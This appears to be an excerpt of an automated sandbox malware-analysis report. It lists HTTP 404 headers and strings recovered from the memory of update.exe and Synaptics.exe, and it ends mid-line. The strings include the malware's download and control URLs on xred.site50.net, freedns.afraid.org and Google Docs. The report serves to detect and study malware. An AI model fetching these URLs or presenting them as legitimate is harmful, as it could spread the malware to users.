                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6BM2w1EtFIOjWteUAWI0ekjlD2Mwua5zxZ1IyIOqCCpjQ-V7wXuq4cF1IGEx18L4tyContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:54 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-kYGr9z8oTTT5g78aWrYGXA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5JoDYTSd9Zcblo0EoCs42GRnpHNEf-X8y7_anhzywLvhZk7I_-nQrYnVAnaHR_GXs-Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:56 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-3OXH-uYTzLQDmCUes-nivQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6KURBn94KdWFVNjfMSHkkkYgBUxeysxoDEDp4ZNpl84bC2xx1jZw-GyJNQNQhvTTIYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:56 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-otIf_qSbnJ7Tm5G494W_Iw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5p6MiyzwO3GbisrytULjxFdJ0wCxnUNVwzSIGYjRKy3F_YvFMkCBvIKKPJ6D6m4njHContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:57 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-6MxZmX7i5j-4RntVZ_N1sQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6bjFWWitvPEQHnNrjyw4YNcxSGlMu_9fFj6RKjywihOfi-iyM6buX-siPqT_6snSW9Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:57 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-BZCMat_UMhf3vLVrGoOTUg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4v_ziLqUg3-KAnAZZiJSFT07NKbsHWBj4-RcRxSr6T9sV-Ed-i4eTe_DLIpnOUw30zzgHO8JcContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:58 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Gg6kYUWaOZCP3vVrNopb2Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC66WoQ1wPKlqFV4SdMoI2SFrh2YPDPAB4neIeeHcaAJWypiqVPiQT6zN1GqkzUAMfmIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:58 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-zIRRizLESPECmYSE0H-8ug' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6bdvzGixzdAtN_i9ERU_GMMj4XxmeXrshuEh5buTJShKI8eUXe1h1EBTfA8DflHoQ8FrwBkVYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:20 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-64GxKGMLjKDu0-QlwYw7dA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4fB7jdx7EHwZfjeYqEni3zUyFpv5Qm-5d5FuHCh3ADxED6r93qwiIZpOe460AiZWd0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:20 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-sEIk3epK8-qqXZx6L1iAQw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: update.exe, 00000006.00000003.1904510384.00000000022F0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2811128271.000000000568B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2806590322.00000000022C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                              Source: ._cache_update.exe, 00000007.00000002.3025189873.00000000048F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-score.com/checkip/16
                              Source: update.exe, 00000006.00000003.1904510384.00000000022F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dl
                              Source: update.exe, 00000006.00000003.1903419089.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2806590322.00000000022C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll
                              Source: update.exe, 00000006.00000003.1904510384.00000000022F0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2806590322.00000000022C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SUpdate.ini
                              Source: update.exe, 00000006.00000003.1904510384.00000000022F0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2806590322.00000000022C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/Synaptics.rar
                              Source: Synaptics.exe, 0000000A.00000003.2047511429.0000000005726000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000003.2047511429.00000000056FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/
                              Source: Synaptics.exe, 0000000A.00000003.2047511429.0000000005726000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/4
                              Source: Synaptics.exe, 0000000A.00000003.2047511429.0000000005726000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/4XzmZ
                              Source: Synaptics.exe, 0000000A.00000003.2047511429.0000000005726000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/8zMZ
                              Source: Synaptics.exe, 0000000A.00000003.2047511429.0000000005726000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/d
                              Source: Synaptics.exe, 0000000A.00000002.2863779915.00000000157FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2869325924.0000000017FFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2858499668.0000000012EBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2853272324.000000001023E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2930202179.000000002B0BE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0;
                              Source: update.exe, 00000006.00000003.1904510384.00000000022F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downlo
                              Source: update.exe, 00000001.00000000.1765967777.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Synaptics.exe, 0000000A.00000002.2806590322.00000000022C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
                              Source: update.exe, 00000006.00000003.1904510384.00000000022F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloX
                              Source: Synaptics.exe, 0000000A.00000002.2896383994.000000001D8DB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2856158540.0000000011E7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2935694631.000000002DE7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2856319233.0000000011FBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2854845527.000000001113E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2943994929.000000002F3BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2870941232.0000000018C7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2842455908.000000000EF3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2863140970.000000001543E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2898557815.000000001E1FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2918043582.000000002507E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2898181904.000000001DE3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2871376400.000000001917E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2924316013.000000002877E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2828922985.00000000083BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2932952505.000000002C73E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2863651892.00000000156BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2945163388.000000002FC7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2863896117.000000001593E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2830590514.00000000092BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2863274761.000000001557E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                              Source: Synaptics.exe, 0000000A.00000002.2890890608.000000001D736000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.000000000710C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2851712170.000000000F7E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2892404923.000000001D7B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000003.2047511429.0000000005707000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#(uY0
                              Source: Synaptics.exe, 0000000A.00000002.2843843804.000000000F482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#VJZ
                              Source: Synaptics.exe, 0000000A.00000002.2849014206.000000000F698000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.0000000007203000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2851712170.000000000F7E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2892404923.000000001D7B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2805475098.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2892404923.000000001D79E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$SpZ
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.0000000005730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$j
                              Source: Synaptics.exe, 0000000A.00000002.2847387156.000000000F5FF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2892404923.000000001D79E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%
                              Source: Synaptics.exe, 0000000A.00000002.2849014206.000000000F698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%(1XW
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.0000000005730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%i
                              Source: Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%v#
                              Source: Synaptics.exe, 0000000A.00000002.2896383994.000000001D8DB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2805475098.000000000084D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2865312774.00000000165BE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&0
                              Source: Synaptics.exe, 0000000A.00000002.2872628188.0000000019F3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2919051915.000000002593E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2921068207.000000002683E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2861771598.00000000148FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000003.2047367326.000000000575E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2865048284.000000001633E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2864937127.00000000161FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2872287427.0000000019B7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2862170909.0000000014CBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2892404923.000000001D79E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2811128271.00000000056C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2864021001.0000000015A7E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(
                              Source: Synaptics.exe, 0000000A.00000002.2849014206.000000000F698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download((
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.0000000005730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(i
                              Source: Synaptics.exe, 0000000A.00000002.2805475098.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2896383994.000000001D8DB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2849014206.000000000F698000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2851712170.000000000F7E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)
                              Source: Synaptics.exe, 0000000A.00000002.2847387156.000000000F5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)E8_=
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)P
                              Source: Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.0000000007203000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-0
                              Source: Synaptics.exe, 0000000A.00000002.2847387156.000000000F5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-F4X0
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000003.2047511429.0000000005707000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-Opt~
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-b
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-cn.c
                              Source: Synaptics.exe, 0000000A.00000002.2805475098.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000003.2047221664.00000000008EA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.00000000071A5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2851712170.000000000F7E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 